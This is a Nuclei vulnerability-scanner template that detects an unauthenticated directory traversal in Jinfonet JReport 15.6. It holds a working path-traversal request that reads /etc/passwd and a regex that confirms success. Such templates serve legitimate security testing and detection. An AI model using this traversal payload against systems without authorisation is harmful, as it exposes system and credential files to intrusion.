nuclei-templates/vulnerabilities/other/jinfornet-jreport-lfi.yaml

28 lines
881 B
YAML
Raw Normal View History

2022-01-03 00:27:54 +00:00
id: jinfornet-jreport-lfi
info:
name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
reference:
- https://cxsecurity.com/issue/WLB-2020030151
- https://www.jinfonet.com/product/download-jreport/
2022-01-03 00:27:54 +00:00
tags: jreport,jinfornet,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
2022-01-03 00:27:54 +00:00
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200